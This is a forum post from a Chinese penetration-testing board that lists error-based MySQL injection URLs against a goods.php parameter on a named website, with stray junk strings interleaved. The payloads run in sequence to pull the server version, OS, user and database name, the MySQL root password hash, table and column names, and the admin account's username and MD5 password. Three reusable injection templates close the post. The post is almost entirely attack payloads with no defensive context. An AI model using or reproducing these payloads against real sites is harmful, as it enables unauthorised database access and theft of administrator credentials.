找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1967|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
9 {) k! M, W7 B8 M! bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 k* ?9 u/ q  _! K# P6 T9 @( {  i9 A. W
判断系统9 Y# e7 ?; E' \
, i" Z- K! H: t( ~7 f
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: F0 a; O5 I3 {  D- }  D
3 t3 J  F5 l1 X7 S0 e! E/ K" s# w% w

. z& U; C7 y" C, c# b  p当前 user()* }0 {( S' m6 F2 T8 g( ~" j
  S# j3 g* t. ^, p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 m/ L% _4 I% L6 `% ^+ t4 e: G
' t) H, L! w- B4 W( n& k* @1 a; n
" b0 c+ a$ u. p5 _0 W
4 {1 v- @; j* N0 R当前 database()$ X& Y7 R8 S, z' `! y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ q" i. p) o, Y0 L) M8 U9 c

# a- \* S; D! r
9 L6 R' d  c5 P  @0 I) Q; z' Y$ Y1 a6 ]1 E
: i- N" V( E; x" v, K8 ^
root hash' g+ I2 G* ^" y  c

3 k) k, \9 K2 ~- C0 Whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# ]7 @, |4 @* C: w' i
3 a; I5 C: c/ Y. Q: a( m) C
+ n, _, r4 t2 q% x1 F3 t1 R
2 l  L9 ~) w9 d& V( |7 e' l
当前 数据库表名4 |5 Q; C- g5 r5 P. n% k) m) i
% a+ u' f$ O2 }' V: ^- A9 t
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* M" E" w* P) L) V6 J5 c. u4 {/ M. b
4 j1 d3 \* l/ U) R4 W! Q  o* B" n  i
8 k+ Q$ Z$ }5 t) n& O0 j
当前 数据库 user_name 字段
# a8 R% Z0 H& c  R. p+ G
$ g0 L/ Z6 s6 F5 K8 g4 E/ V' F1 ~http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ y9 \& b2 W# e) g6 ?$ |: ^( a1 q, }5 e, F: A% S
当前 数据库 字段 password
+ G2 r" K& A+ e& Jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 w/ X7 i% @3 q5 g% v

2 `" J+ s% p  @: x2 y9 k. _/ F
: O( h; B! Y. w+ m9 Q& q: L; M9 _- r
+ T% o# s$ q" v, U. S" Y获得 admin passwd(md5)
, y# A8 Q5 G7 l4 T) W# u% @, w& f6 p7 \- Q1 `
9 e; [4 f4 L3 i% j! B* t
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 V- q8 f1 a* x6 y9 T! C4 v+ t
% ]) f% y7 m4 [- ~" D报错注射
( o) N: Z5 I4 Q; `: b& N' B- x! j3 aSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
, G5 t7 M% _- r' D, K: c- g" {' g! o5 A
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
+ ^3 F+ n8 f$ H( s# s
8 S% m6 t3 a; D& c+ Wand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表